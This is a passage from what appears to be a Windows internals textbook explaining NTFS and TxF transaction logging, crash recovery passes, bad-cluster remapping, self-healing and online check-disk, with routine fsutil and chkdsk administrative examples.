RM prefers availability over consistency.
As mentioned, the fsutil resource command has many options
for configuring TxF resource managers, including the ability to
create a secondary resource manager in any directory of your
choice. For example, you can use the fsutil resource create
c:\rmtest command to create a secondary resource manager in the
Rmtest directory, followed by the fsutil resource start c:\rmtest
command to initiate it. Note the presence of the $Tops and
$TxfLogContainer* files and of the TxfLog and $Txf directories in
this folder.
Logging implementation
As mentioned earlier, each time a change is made to the disk because of an
ongoing transaction, TxF writes a record of the change to its log. TxF uses a
variety of log record types to keep track of transactional changes, but
regardless of the record type, all TxF log records have a generic header that
contains information identifying the type of the record, the action related to
the record, the TxID that the record applies to, and the GUID of the KTM
transaction that the record is associated with.
A redo record specifies how to reapply a change part of a transaction
that’s already been committed to the volume if the transaction has actually
never been flushed from cache to disk. An undo record, on the other hand,
specifies how to reverse a change part of a transaction that hasn’t been
committed at the time of a rollback. Some records are redo-only, meaning
they don’t contain any equivalent undo data, whereas other records contain
both redo and undo information.
Through the TOPS file, TxF maintains two critical pieces of data, the base
LSN and the restart LSN. The base LSN determines the LSN of the first valid
record in the log, while the restart LSN indicates at which LSN recovery
should begin when starting the resource manager. When TxF writes a restart
record, it updates these two values, indicating that changes have been made
to the volume and flushed out to disk—meaning that the file system is fully
consistent up to the new restart LSN.
TxF also writes compensating log records, or CLRs. These records store
the actions that are being performed during transaction rollback. They’re
primarily used to store the undo-next LSN, which allows the recovery process
to avoid repeated undo operations by bypassing undo records that have
already been processed, a situation that can happen if the system fails during
the recovery phase and has already performed part of the undo pass. Finally,
TxF also deals with prepare records, abort records, and commit records,
which describe the state of the KTM transactions related to TxF.
NTFS recovery support
NTFS recovery support ensures that if a power failure or a system failure
occurs, no file system operations (transactions) will be left incomplete, and
the structure of the disk volume will remain intact without the need to run a
disk repair utility. The NTFS Chkdsk utility is used to repair catastrophic disk
corruption caused by I/O errors (bad disk sectors, electrical anomalies, or
disk failures, for example) or software bugs. But with the NTFS recovery
capabilities in place, Chkdsk is rarely needed.
As mentioned earlier (in the section “Recoverability”), NTFS uses a
transaction-processing scheme to implement recoverability. This strategy
ensures a full disk recovery that is also extremely fast (on the order of
seconds) for even the largest disks. NTFS limits its recovery procedures to
file system data to ensure that at the very least the user will never lose a
volume because of a corrupted file system; however, unless an application
takes specific action (such as flushing cached files to disk), NTFS’s recovery
support doesn’t guarantee user data to be fully updated if a crash occurs. This
is the job of transactional NTFS (TxF).
The following sections detail the transaction-logging scheme NTFS uses to
record modifications to file system data structures and explain how NTFS
recovers a volume if the system fails.
Design
NTFS implements the design of a recoverable file system. These file systems
ensure volume consistency by using logging techniques (sometimes called
journaling) originally developed for transaction processing. If the operating
system crashes, the recoverable file system restores consistency by executing
a recovery procedure that accesses information that has been stored in a log
file. Because the file system has logged its disk writes, the recovery
procedure takes only seconds, regardless of the size of the volume (unlike in
the FAT file system, where the repair time is related to the volume size). The
recovery procedure for a recoverable file system is exact, guaranteeing that
the volume will be restored to a consistent state.
A recoverable file system incurs some costs for the safety it provides.
Every transaction that alters the volume structure requires that one record be
written to the log file for each of the transaction’s suboperations. This
logging overhead is ameliorated by the file system’s batching of log records
—writing many records to the log file in a single I/O operation. In addition,
the recoverable file system can employ the optimization techniques of a lazy
write file system. It can even increase the length of the intervals between
cache flushes because the file system metadata can be recovered if the system
crashes before the cache changes have been flushed to disk. This gain over
the caching performance of lazy write file systems makes up for, and often
exceeds, the overhead of the recoverable file system’s logging activity.
Neither careful write nor lazy write file systems guarantee protection of
user file data. If the system crashes while an application is writing a file, the
file can be lost or corrupted. Worse, the crash can corrupt a lazy write file
system, destroying existing files or even rendering an entire volume
inaccessible.
The NTFS recoverable file system implements several strategies that
improve its reliability over that of the traditional file systems. First, NTFS
recoverability guarantees that the volume structure won’t be corrupted, so all
files will remain accessible after a system failure. Second, although NTFS
doesn’t guarantee protection of user data in the event of a system crash—
some changes can be lost from the cache—applications can take advantage of
the NTFS write-through and cache-flushing capabilities to ensure that file
modifications are recorded on disk at appropriate intervals.
Both cache write-through—forcing write operations to be immediately
recorded on disk—and cache flushing—forcing cache contents to be written
to disk—are efficient operations. NTFS doesn’t have to do extra disk I/O to
flush modifications to several different file system data structures because
changes to the data structures are recorded—in a single write operation—in
the log file; if a failure occurs and cache contents are lost, the file system
modifications can be recovered from the log. Furthermore, unlike the FAT
file system, NTFS guarantees that user data will be consistent and available
immediately after a write-through operation or a cache flush, even if the
system subsequently fails.
Metadata logging
NTFS provides file system recoverability by using the same logging
technique used by TxF, which consists of recording all operations that
modify file system metadata to a log file. Unlike TxF, however, NTFS’s
built-in file system recovery support doesn’t make use of CLFS but uses an
internal logging implementation called the log file service (which is not a
background service process as described in Chapter 10). Another difference
is that while TxF is used only when callers opt in for transacted operations,
NTFS records all metadata changes so that the file system can be made
consistent in the face of a system failure.
Log file service
The log file service (LFS) is a series of kernel-mode routines inside the NTFS
driver that NTFS uses to access the log file. NTFS passes the LFS a pointer
to an open file object, which specifies a log file to be accessed. The LFS
either initializes a new log file or calls the Windows cache manager to access
the existing log file through the cache, as shown in Figure 11-56. Note that
although LFS and CLFS have similar sounding names, they’re separate
logging implementations used for different purposes, although their operation
is similar in many ways.
Figure 11-56 Log file service (LFS).
The LFS divides the log file into two regions: a restart area and an
“infinite” logging area, as shown in Figure 11-57.
Figure 11-57 Log file regions.
NTFS calls the LFS to read and write the restart area. NTFS uses the
restart area to store context information such as the location in the logging
area at which NTFS begins to read during recovery after a system failure.
The LFS maintains a second copy of the restart data in case the first becomes
corrupted or otherwise inaccessible. The remainder of the log file is the
logging area, which contains transaction records NTFS writes to recover a
volume in the event of a system failure. The LFS makes the log file appear
infinite by reusing it circularly (while guaranteeing that it doesn’t overwrite
information it needs). Just like CLFS, the LFS uses LSNs to identify records
written to the log file. As the LFS cycles through the file, it increases the
values of the LSNs. NTFS uses 64 bits to represent LSNs, so the number of
possible LSNs is so large as to be virtually infinite.
NTFS never reads transactions from or writes transactions to the log file
directly. The LFS provides services that NTFS calls to open the log file,
write log records, read log records in forward or backward order, flush log
records up to a specified LSN, or set the beginning of the log file to a higher
LSN. During recovery, NTFS calls the LFS to perform the same actions as
described in the TxF recovery section: a redo pass for nonflushed committed
changes, followed by an undo pass for noncommitted changes.
Here’s how the system guarantees that the volume can be recovered:
1.
NTFS first calls the LFS to record in the (cached) log file any
transactions that will modify the volume structure.
2.
NTFS modifies the volume (also in the cache).
3.
The cache manager prompts the LFS to flush the log file to disk. (The
LFS implements the flush by calling the cache manager back, telling
it which pages of memory to flush. Refer back to the calling sequence
shown in Figure 11-56.)
4.
After the cache manager flushes the log file to disk, it flushes the
volume changes (the metadata operations themselves) to disk.
These steps ensure that if the file system modifications are ultimately
unsuccessful, the corresponding transactions can be retrieved from the log
file and can be either redone or undone as part of the file system recovery
procedure.
File system recovery begins automatically the first time the volume is used
after the system is rebooted. NTFS checks whether the transactions that were
recorded in the log file before the crash were applied to the volume, and if
they weren’t, it redoes them. NTFS also guarantees that transactions not
completely logged before the crash are undone so that they don’t appear on
the volume.
Log record types
The NTFS recovery mechanism uses similar log record types as the TxF
recovery mechanism: update records, which correspond to the redo and undo
records that TxF uses, and checkpoint records, which are similar to the restart
records used by TxF. Figure 11-58 shows three update records in the log file.
Each record represents one suboperation of a transaction, creating a new file.
The redo entry in each update record tells NTFS how to reapply the
suboperation to the volume, and the undo entry tells NTFS how to roll back
(undo) the suboperation.
Figure 11-58 Update records in the log file.
After logging a transaction (in this example, by calling the LFS to write
the three update records to the log file), NTFS performs the suboperations on
the volume itself, in the cache. When it has finished updating the cache,
NTFS writes another record to the log file, recording the entire transaction as
complete—a suboperation known as committing a transaction. Once a
transaction is committed, NTFS guarantees that the entire transaction will
appear on the volume, even if the operating system subsequently fails.
When recovering after a system failure, NTFS reads through the log file
and redoes each committed transaction. Although NTFS completed the
committed transactions from before the system failure, it doesn’t know
whether the cache manager flushed the volume modifications to disk in time.
The updates might have been lost from the cache when the system failed.
Therefore, NTFS executes the committed transactions again just to be sure
that the disk is up to date.
After redoing the committed transactions during a file system recovery,
NTFS locates all the transactions in the log file that weren’t committed at
failure and rolls back each suboperation that had been logged. In Figure 11-
58, NTFS would first undo the T1c suboperation and then follow the
backward pointer to T1b and undo that suboperation. It would continue to
follow the backward pointers, undoing suboperations, until it reached the first
suboperation in the transaction. By following the pointers, NTFS knows how
many and which update records it must undo to roll back a transaction.
Redo and undo information can be expressed either physically or logically.
As the lowest layer of software maintaining the file system structure, NTFS
writes update records with physical descriptions that specify volume updates
in terms of particular byte ranges on the disk that are to be changed, moved,
and so on, unlike TxF, which uses logical descriptions that express updates
in terms of operations such as “delete file A.dat.” NTFS writes update
records (usually several) for each of the following transactions:
■ Creating a file
■ Deleting a file
■ Extending a file
■ Truncating a file
■ Setting file information
■ Renaming a file
■ Changing the security applied to a file
The redo and undo information in an update record must be carefully
designed because although NTFS undoes a transaction, recovers from a
system failure, or even operates normally, it might try to redo a transaction
that has already been done or, conversely, to undo a transaction that never
occurred or that has already been undone. Similarly, NTFS might try to redo
or undo a transaction consisting of several update records, only some of
which are complete on disk. The format of the update records must ensure
that executing redundant redo or undo operations is idempotent—that is, has
a neutral effect. For example, setting a bit that is already set has no effect, but
toggling a bit that has already been toggled does. The file system must also
handle intermediate volume states correctly.
In addition to update records, NTFS periodically writes a checkpoint
record to the log file, as illustrated in Figure 11-59.
Figure 11-59 Checkpoint record in the log file.
A checkpoint record helps NTFS determine what processing would be
needed to recover a volume if a crash were to occur immediately. Using
information stored in the checkpoint record, NTFS knows, for example, how
far back in the log file it must go to begin its recovery. After writing a
checkpoint record, NTFS stores the LSN of the record in the restart area so
that it can quickly find its most recently written checkpoint record when it
begins file system recovery after a crash occurs; this is similar to the restart
LSN used by TxF for the same reason.
Although the LFS presents the log file to NTFS as if it were infinitely
large, it isn’t. The generous size of the log file and the frequent writing of
checkpoint records (an operation that usually frees up space in the log file)
make the possibility of the log file filling up a remote one. Nevertheless, the
LFS, just like CLFS, accounts for this possibility by tracking several
operational parameters:
■ The available log space
■ The amount of space needed to write an incoming log record and to
undo the write, should that be necessary
■ The amount of space needed to roll back all active (noncommitted)
transactions, should that be necessary
If the log file doesn’t contain enough available space to accommodate the
total of the last two items, the LFS returns a “log file full” error, and NTFS
raises an exception. The NTFS exception handler rolls back the current
transaction and places it in a queue to be restarted later.
To free up space in the log file, NTFS must momentarily prevent further
transactions on files. To do so, NTFS blocks file creation and deletion and
then requests exclusive access to all system files and shared access to all user
files. Gradually, active transactions either are completed successfully or
receive the “log file full” exception. NTFS rolls back and queues the
transactions that receive the exception.
Once it has blocked transaction activity on files as just described, NTFS
calls the cache manager to flush unwritten data to disk, including unwritten
log file data. After everything is safely flushed to disk, NTFS no longer
needs the data in the log file. It resets the beginning of the log file to the
current position, making the log file “empty.” Then it restarts the queued
transactions. Beyond the short pause in I/O processing, the log file full error
has no effect on executing programs.
This scenario is one example of how NTFS uses the log file not only for
file system recovery but also for error recovery during normal operation. You
find out more about error recovery in the following section.
Recovery
NTFS automatically performs a disk recovery the first time a program
accesses an NTFS volume after the system has been booted. (If no recovery
is needed, the process is trivial.) Recovery depends on two tables NTFS
maintains in memory: a transaction table, which behaves just like the one
TxF maintains, and a dirty page table, which records which pages in the
cache contain modifications to the file system structure that haven’t yet been
written to disk. This data must be flushed to disk during recovery.
NTFS writes a checkpoint record to the log file once every 5 seconds. Just
before it does, it calls the LFS to store a current copy of the transaction table
and of the dirty page table in the log file. NTFS then records in the
checkpoint record the LSNs of the log records containing the copied tables.
When recovery begins after a system failure, NTFS calls the LFS to locate
the log records containing the most recent checkpoint record and the most
recent copies of the transaction and dirty page tables. It then copies the tables
to memory.
The log file usually contains more update records following the last
checkpoint record. These update records represent volume modifications that
occurred after the last checkpoint record was written. NTFS must update the
transaction and dirty page tables to include these operations. After updating
the tables, NTFS uses the tables and the contents of the log file to update the
volume itself.
To perform its volume recovery, NTFS scans the log file three times,
loading the file into memory during the first pass to minimize disk I/O. Each
pass has a particular purpose:
1.
Analysis
2.
Redoing transactions
3.
Undoing transactions
Analysis pass
During the analysis pass, as shown in Figure 11-60, NTFS scans forward in
the log file from the beginning of the last checkpoint operation to find update
records and use them to update the transaction and dirty page tables it copied
to memory. Notice in the figure that the checkpoint operation stores three
records in the log file and that update records might be interspersed among
these records. NTFS therefore must start its scan at the beginning of the
checkpoint operation.
Figure 11-60 Analysis pass.
Most update records that appear in the log file after the checkpoint
operation begins represent a modification to either the transaction table or the
dirty page table. If an update record is a “transaction committed” record, for
example, the transaction the record represents must be removed from the
transaction table. Similarly, if the update record is a page update record that
modifies a file system data structure, the dirty page table must be updated to
reflect that change.
Once the tables are up to date in memory, NTFS scans the tables to
determine the LSN of the oldest update record that logs an operation that
hasn’t been carried out on disk. The transaction table contains the LSNs of
the noncommitted (incomplete) transactions, and the dirty page table contains
the LSNs of records in the cache that haven’t been flushed to disk. The LSN
of the oldest update record that NTFS finds in these two tables determines
where the redo pass will begin. If the last checkpoint record is older,
however, NTFS will start the redo pass there instead.
Note
In the TxF recovery model, there is no distinct analysis pass. Instead, as
described in the TxF recovery section, TxF performs the equivalent work
in the redo pass.
Redo pass
During the redo pass, as shown in Figure 11-61, NTFS scans forward in the
log file from the LSN of the oldest update record, which it found during the
analysis pass. It looks for page update records, which contain volume
modifications that were written before the system failure but that might not
have been flushed to disk. NTFS redoes these updates in the cache.
Figure 11-61 Redo pass.
When NTFS reaches the end of the log file, it has updated the cache with
the necessary volume modifications, and the cache manager’s lazy writer can
begin writing cache contents to disk in the background.
Undo pass
After it completes the redo pass, NTFS begins its undo pass, in which it rolls
back any transactions that weren’t committed when the system failed. Figure
11-62 shows two transactions in the log file; transaction 1 was committed
before the power failure, but transaction 2 wasn’t. NTFS must undo
transaction 2.
Figure 11-62 Undo pass.
Suppose that transaction 2 created a file, an operation that comprises three
suboperations, each with its own update record. The update records of a
transaction are linked by backward pointers in the log file because they aren’t
usually contiguous.
The NTFS transaction table lists the LSN of the last-logged update record
for each noncommitted transaction. In this example, the transaction table
identifies LSN 4049 as the last update record logged for transaction 2. As
shown from right to left in Figure 11-63, NTFS rolls back transaction 2.
Figure 11-63 Undoing a transaction.
After locating LSN 4049, NTFS finds the undo information and executes
it, clearing bits 3 through 9 in its allocation bitmap. NTFS then follows the
backward pointer to LSN 4048, which directs it to remove the new file name
from the appropriate file name index. Finally, it follows the last backward
pointer and deallocates the MFT file record reserved for the file, as the
update record with LSN 4046 specifies. Transaction 2 is now rolled back. If
there are other noncommitted transactions to undo, NTFS follows the same
procedure to roll them back. Because undoing transactions affects the
volume’s file system structure, NTFS must log the undo operations in the log
file. After all, the power might fail again during the recovery, and NTFS
would have to redo its undo operations!
When the undo pass of the recovery is finished, the volume has been
restored to a consistent state. At this point, NTFS is prepared to flush the
cache changes to disk to ensure that the volume is up to date. Before doing
so, however, it executes a callback that TxF registers for notifications of LFS
flushes. Because TxF and NTFS both use write-ahead logging, TxF must
flush its log through CLFS before the NTFS log is flushed to ensure
consistency of its own metadata. (And similarly, the TOPS file must be
flushed before the CLFS-managed log files.) NTFS then writes an “empty”
LFS restart area to indicate that the volume is consistent and that no recovery
need be done if the system should fail again immediately. Recovery is
complete.
NTFS guarantees that recovery will return the volume to some preexisting
consistent state, but not necessarily to the state that existed just before the
system crash. NTFS can’t make that guarantee because, for performance, it
uses a lazy commit algorithm, which means that the log file isn’t
immediately flushed to disk each time a transaction committed record is
written. Instead, numerous transaction committed records are batched and
written together, either when the cache manager calls the LFS to flush the log
file to disk or when the LFS writes a checkpoint record (once every 5
seconds) to the log file. Another reason the recovered volume might not be
completely up to date is that several parallel transactions might be active
when the system crashes, and some of their transaction committed records
might make it to disk, whereas others might not. The consistent volume that
recovery produces includes all the volume updates whose transaction
committed records made it to disk and none of the updates whose transaction
committed records didn’t make it to disk.
NTFS uses the log file to recover a volume after the system fails, but it
also takes advantage of an important freebie it gets from logging transactions.
File systems necessarily contain a lot of code devoted to recovering from file
system errors that occur during the course of normal file I/O. Because NTFS
logs each transaction that modifies the volume structure, it can use the log
file to recover when a file system error occurs and thus can greatly simplify
its error handling code. The log file full error described earlier is one
example of using the log file for error recovery.
Most I/O errors that a program receives aren’t file system errors and
therefore can’t be resolved entirely by NTFS. When called to create a file, for
example, NTFS might begin by creating a file record in the MFT and then
enter the new file’s name in a directory index. When it tries to allocate space
for the file in its bitmap, however, it could discover that the disk is full and
the create request can’t be completed. In such a case, NTFS uses the
information in the log file to undo the part of the operation it has already
completed and to deallocate the data structures it reserved for the file. Then it
returns a disk full error to the caller, which in turn must respond
appropriately to the error.
NTFS bad-cluster recovery
The volume manager included with Windows (VolMgr) can recover data
from a bad sector on a fault-tolerant volume, but if the hard disk doesn’t
perform bad-sector remapping or runs out of spare sectors, the volume
manager can’t perform bad-sector replacement to replace the bad sector.
When the file system reads from the sector, the volume manager instead
recovers the data and returns the warning to the file system that there is only
one copy of the data.
The FAT file system doesn’t respond to this volume manager warning.
Moreover, neither FAT nor the volume manager keeps track of the bad
sectors, so a user must run the Chkdsk or Format utility to prevent the
volume manager from repeatedly recovering data for the file system. Both
Chkdsk and Format are less than ideal for removing bad sectors from use.
Chkdsk can take a long time to find and remove bad sectors, and Format
wipes all the data off the partition it’s formatting.
In the file system equivalent of a volume manager’s bad-sector
replacement, NTFS dynamically replaces the cluster containing a bad sector
and keeps track of the bad cluster so that it won’t be reused. (Recall that
NTFS maintains portability by addressing logical clusters rather than
physical sectors.) NTFS performs these functions when the volume manager
can’t perform bad-sector replacement. When a volume manager returns a
bad-sector warning or when the hard disk driver returns a bad-sector error,
NTFS allocates a new cluster to replace the one containing the bad sector.
NTFS copies the data that the volume manager has recovered into the new
cluster to reestablish data redundancy.
Figure 11-64 shows an MFT record for a user file with a bad cluster in one
of its data runs as it existed before the cluster went bad. When it receives a
bad-sector error, NTFS reassigns the cluster containing the sector to its bad-
cluster file, $BadClus. This prevents the bad cluster from being allocated to
another file. NTFS then allocates a new cluster for the file and changes the
file’s VCN-to-LCN mappings to point to the new cluster. This bad-cluster
remapping (introduced earlier in this chapter) is illustrated in Figure 11-64.
Cluster number 1357, which contains the bad sector, must be replaced by a
good cluster.
Figure 11-64 MFT record for a user file with a bad cluster.
Bad-sector errors are undesirable, but when they do occur, the combination
of NTFS and the volume manager provides the best possible solution. If the
bad sector is on a redundant volume, the volume manager recovers the data
and replaces the sector if it can. If it can’t replace the sector, it returns a
warning to NTFS, and NTFS replaces the cluster containing the bad sector.
If the volume isn’t configured as a redundant volume, the data in the bad
sector can’t be recovered. When the volume is formatted as a FAT volume
and the volume manager can’t recover the data, reading from the bad sector
yields indeterminate results. If some of the file system’s control structures
reside in the bad sector, an entire file or group of files (or potentially, the
whole disk) can be lost. At best, some data in the affected file (often, all the
data in the file beyond the bad sector) is lost. Moreover, the FAT file system
is likely to reallocate the bad sector to the same or another file on the volume,
causing the problem to resurface.
Like the other file systems, NTFS can’t recover data from a bad sector
without help from a volume manager. However, NTFS greatly contains the
damage a bad sector can cause. If NTFS discovers the bad sector during a
read operation, it remaps the cluster the sector is in, as shown in Figure 11-
65. If the volume isn’t configured as a redundant volume, NTFS returns a
data read error to the calling program. Although the data that was in that
cluster is lost, the rest of the file—and the file system—remains intact; the
calling program can respond appropriately to the data loss, and the bad
cluster won’t be reused in future allocations. If NTFS discovers the bad
cluster on a write operation rather than a read, NTFS remaps the cluster
before writing and thus loses no data and generates no error.
Figure 11-65 Bad-cluster remapping.
The same recovery procedures are followed if file system data is stored in
a sector that goes bad. If the bad sector is on a redundant volume, NTFS
replaces the cluster dynamically, using the data recovered by the volume
manager. If the volume isn’t redundant, the data can’t be recovered, so NTFS
sets a bit in the $Volume metadata file that indicates corruption on the
volume. The NTFS Chkdsk utility checks this bit when the system is next
rebooted, and if the bit is set, Chkdsk executes, repairing the file system
corruption by reconstructing the NTFS metadata.
In rare instances, file system corruption can occur even on a fault-tolerant
disk configuration. A double error can destroy both file system data and the
means to reconstruct it. If the system crashes while NTFS is writing the
mirror copy of an MFT file record—of a file name index or of the log file,
for example—the mirror copy of such file system data might not be fully
updated. If the system were rebooted and a bad-sector error occurred on the
primary disk at exactly the same location as the incomplete write on the disk
mirror, NTFS would be unable to recover the correct data from the disk
mirror. NTFS implements a special scheme for detecting such corruptions in
file system data. If it ever finds an inconsistency, it sets the corruption bit in
the volume file, which causes Chkdsk to reconstruct the NTFS metadata
when the system is next rebooted. Because file system corruption is rare on a
fault-tolerant disk configuration, Chkdsk is seldom needed. It is supplied as a
safety precaution rather than as a first-line data recovery strategy.
The use of Chkdsk on NTFS is vastly different from its use on the FAT
file system. Before writing anything to disk, FAT sets the volume’s dirty bit
and then resets the bit after the modification is complete. If any I/O operation
is in progress when the system crashes, the dirty bit is left set and Chkdsk
runs when the system is rebooted. On NTFS, Chkdsk runs only when
unexpected or unreadable file system data is found, and NTFS can’t recover
the data from a redundant volume or from redundant file system structures on
a single volume. (The system boot sector is duplicated—in the last sector of a
volume—as are the parts of the MFT ($MftMirr) required for booting the
system and running the NTFS recovery procedure. This redundancy ensures
that NTFS will always be able to boot and recover itself.)
Table 11-11 summarizes what happens when a sector goes bad on a disk
volume formatted for one of the Windows-supported file systems according
to various conditions we’ve described in this section.
Table 11-11 Summary of NTFS data recovery scenarios
Scenar
With a Disk That
With a Disk That Does Not
io
Supports Bad-Sector
Remapping and Has
Spare Sectors
Perform Bad-Sector
Remapping or Has No Spare
Sectors
Fault-
tolerant
volume
1
1.
Volume manager
recovers the data.
2.
Volume manager
performs bad-
sector replacement.
3.
File system remains
unaware of the
error.
1.
Volume manager
recovers the data.
2.
Volume manager sends
the data and a bad-
sector error to the file
system.
3.
NTFS performs cluster
remapping.
Non-
fault-
tolerant
volume
1.
Volume manager
can’t recover the
data.
2.
Volume manager
sends a bad-sector
error to the file
system.
3.
NTFS performs
cluster remapping.
1.
Volume manager can’t
recover the data.
2.
Volume manager sends
a bad-sector error to the
file system.
3.
NTFS performs cluster
remapping. Data is lost.
Data is lost.2
1 A fault-tolerant volume is one of the following: a mirror set (RAID-1) or a RAID-5 set.
2 In a write operation, no data is lost: NTFS remaps the cluster before the write.
If the volume on which the bad sector appears is a fault-tolerant volume—
a mirrored (RAID-1) or RAID-5 / RAID-6 volume—and if the hard disk is
one that supports bad-sector replacement (and that hasn’t run out of spare
sectors), it doesn’t matter which file system you’re using (FAT or NTFS).
The volume manager replaces the bad sector without the need for user or file
system intervention.
If a bad sector is located on a hard disk that doesn’t support bad sector
replacement, the file system is responsible for replacing (remapping) the bad
sector or—in the case of NTFS—the cluster in which the bad sector resides.
The FAT file system doesn’t provide sector or cluster remapping. The
benefits of NTFS cluster remapping are that bad spots in a file can be fixed
without harm to the file (or harm to the file system, as the case may be) and
that the bad cluster will never be used again.
Self-healing
With today’s multiterabyte storage devices, taking a volume offline for a
consistency check can result in a service outage of many hours. Recognizing
that many disk corruptions are localized to a single file or portion of
metadata, NTFS implements a self-healing feature to repair damage while a
volume remains online. When NTFS detects corruption, it prevents access to
the damaged file or files and creates a system worker thread that performs
Chkdsk-like corrections to the corrupted data structures, allowing access to
the repaired files when it has finished. Access to other files continues
normally during this operation, minimizing service disruption.
You can use the fsutil repair set command to view and set a volume’s
repair options, which are summarized in Table 11-12. The Fsutil utility uses
the FSCTL_SET_REPAIR file system control code to set these settings,
which are saved in the VCB for the volume.
Table 11-12 NTFS self-healing behaviors
Flag
Behavior
SET_REPA
IR_ENABL
ED
Enable self-healing for the volume.
SET_REPA
IR_WARN
_ABOUT_
DATA_LO
SS
If the self-healing process is unable to fully recover a file,
specifies whether the user should be visually warned.
SET_REPA
IR_DISAB
LED_AND
_BUGCHE
CK_ON_C
ORRUPTI
ON
If the NtfsBugCheckOnCorrupt NTFS registry value was
set by using fsutil behavior set NtfsBugCheckOnCorrupt
1 and this flag is set, the system will crash with a STOP
error 0x24, indicating file system corruption. This setting
is automatically cleared during boot time to avoid
repeated reboot cycles.
In all cases, including when the visual warning is disabled (the default),
NTFS will log any self-healing operation it undertook in the System event
log.
Apart from periodic automatic self-healing, NTFS also supports manually
initiated self-healing cycles (this type of self-healing is called proactive)
through the FSCTL_INITIATE_REPAIR and FSCTL_WAIT_FOR_REPAIR
control codes, which can be initiated with the fsutil repair initiate and fsutil
repair wait commands. This allows the user to force the repair of a specific
file and to wait until repair of that file is complete.
To check the status of the self-healing mechanism, the
FSCTL_QUERY_REPAIR control code or the fsutil repair query command
can be used, as shown here:
Click here to view code image
C:\>fsutil repair query c:
Self healing state on c: is: 0x9
Values: 0x1 - Enable general repair.
0x9 - Enable repair and warn about potential data loss.
0x10 - Disable repair and bugcheck once on first corruption.
Online check-disk and fast repair
Rare cases in which disk-corruptions are not managed by the NTFS file
system driver (through self-healing, Log file service, and so on) require the
system to run the Windows Check Disk tool and to put the volume offline.
There are a variety of unique causes for disk corruption: whether they are
caused by media errors from the hard disk or transient memory errors,
corruptions can happen in file system metadata. In large file servers, which
have multiple terabytes of disk space, running a complete Check Disk can
require days. Having a volume offline for so long in these kinds of scenarios
is typically not acceptable.
Before Windows 8, NTFS implemented a simpler health model, where the
file system volume was either healthy or not (through the dirty bit stored in
the $VOLUME_INFORMATION attribute). In that model, the volume was
taken offline for as long as necessary to fix the file system corruptions and
bring the volume back to a healthy state. Downtime was directly proportional
to the number of files in the volume. Windows 8, with the goal of reducing or
avoiding the downtime caused by file system corruption, has redesigned the
NTFS health model and disk check.
The new model introduces new components that cooperate to provide an
online check-disk tool and to drastically reduce the downtime in case severe
file-system corruption is detected. The NTFS file system driver is able to
identify multiple types of corruption during normal system I/O. If a
corruption is detected, NTFS tries to self-heal it (see the previous paragraph).
If it doesn’t succeed, the NTFS file system driver writes a new corruption
record to the $Verify stream of the \$Extend\$RmMetadata\$Repair file.
A corruption record is a common data structure that NTFS uses for
describing metadata corruptions and is used both in-memory and on-disk. A
corruption record is represented by a fixed-size header, which contains
version information, flags, and uniquely represents the record type through a
GUID, a variable-sized description for the type of corruption that occurred,
and an optional context.
After the entry has been correctly added, NTFS emits an ETW event
through its own event provider (named Microsoft-Windows-Ntfs-UBPM).
This ETW event is consumed by the service control manager, which will
start the Spot Verifier service (more details about triggered-start services are
available in Chapter 10).
The Spot Verifier service (implemented in the Svsvc.dll library) verifies
that the signaled corruption is not a false positive (some corruptions are
intermittent due to memory issues and may not be a result of an actual
corruption on disk). Entries in the $Verify stream are removed while being
verified by the Spot Verifier. If the corruption (described by the entry) is not
a false positive, the Spot Verifier triggers the Proactive Scan Bit (P-bit) in the
$VOLUME_INFORMATION attribute of the volume, which will trigger an
online scan of the file system. The online scan is executed by the Proactive
Scanner, which is run as a maintenance task by the Windows task scheduler
(the task is located in Microsoft\Windows\Chkdsk, as shown in Figure 11-
66) when the time is appropriate.
Figure 11-66 The Proactive Scan maintenance task.
The Proactive scanner is implemented in the Untfs.dll library, which is
imported by the Windows Check Disk tool (Chkdsk.exe). When the
Proactive Scanner runs, it takes a snapshot of the target volume through the
Volume Shadow Copy service and runs a complete Check Disk on the
shadow volume. The shadow volume is read-only; the check disk code
detects this and, instead of directly fixing the errors, uses the self-healing
feature of NTFS to try to automatically fix the corruption. If it fails, it sends a
FSCTL_CORRUPTION_HANDLING code to the file system driver, which in
turn creates an entry in the $Corrupt stream of the
\$Extend\$RmMetadata\$Repair metadata file and sets the volume’s dirty bit.
The dirty bit has a slightly different meaning compared to previous
editions of Windows. The $VOLUME_INFORMATION attribute of the
NTFS root namespace still contains the dirty bit, but also contains the P-bit,
which is used to require a Proactive Scan, and the F-bit, which is used to
require a full check disk due to the severity of a particular corruption. The
dirty bit is set to 1 by the file system driver if the P-bit or the F-bit are
enabled, or if the $Corrupt stream contains one or more corruption records.
If the corruption is still not resolved, at this stage there are no other
possibilities to fix it when the volume is offline (this does not necessarily
require an immediate volume unmounting). The Spot Fixer is a new
component that is shared between the Check Disk and the Autocheck tool.
The Spot Fixer consumes the records inserted in the $Corrupt stream by the
Proactive scanner. At boot time, the Autocheck native application detects that
the volume is dirty, but, instead of running a full check disk, it fixes only the
corrupted entries located in the $Corrupt stream, an operation that requires
only a few seconds. Figure 11-67 shows a summary of the different repair
methodology implemented in the previously described components of the
NTFS file system.
Figure 11-67 A scheme that describes the components that cooperate to
provide online check disk and fast corruption repair for NTFS volumes.
A Proactive scan can be manually started for a volume through the chkdsk
/scan command. In the same way, the Spot Fixer can be executed by the
Check Disk tool using the /spotfix command-line argument.
EXPERIMENT: Testing the online disk check
You can test the online checkdisk by performing a simple
experiment. Assuming that you would like to execute an online
checkdisk on the D: volume, start by playing a large video stream
from the D drive. In the meantime, open an administrative
command prompt window and start an online checkdisk through
the following command:
Click here to view code image
C:\>chkdsk d: /scan
The type of the file system is NTFS.
Volume label is DATA.
Stage 1: Examining basic file system structure ...
4041984 file records processed.
File verification completed.
3778 large file records processed.
0 bad file records processed.
Stage 2: Examining file name linkage ...
Progress: 3454102 of 4056090 done; Stage: 85%; Total: 51%;
ETA: 0:00:43 ..
You will find that the video stream won’t be stopped and
continues to play smoothly. In case the online checkdisk finds an
error that it isn’t able to correct while the volume is mounted, it
will be inserted in the $Corrupt stream of the $Repair system file.
To fix the errors, a volume dismount is needed, but the correction
will be very fast. In that case, you could simply reboot the machine
or manually execute the Spot Fixer through the command line:
C:\>chkdsk d: /spotfix
In case you choose to execute the Spot Fixer, you will find that
the video stream will be interrupted, because the volume needs to
be unmounted.
Encrypted file system
Windows includes a full-volume encryption feature called Windows
BitLocker Drive Encryption. BitLocker encrypts and protects volumes from
offline attacks, but once a system is booted, BitLocker’s job is done. The
Encrypting File System (EFS) protects individual files and directories from
other authenticated users on a system. When choosing how to protect your
data, it is not an either/or choice between BitLocker and EFS; each provides
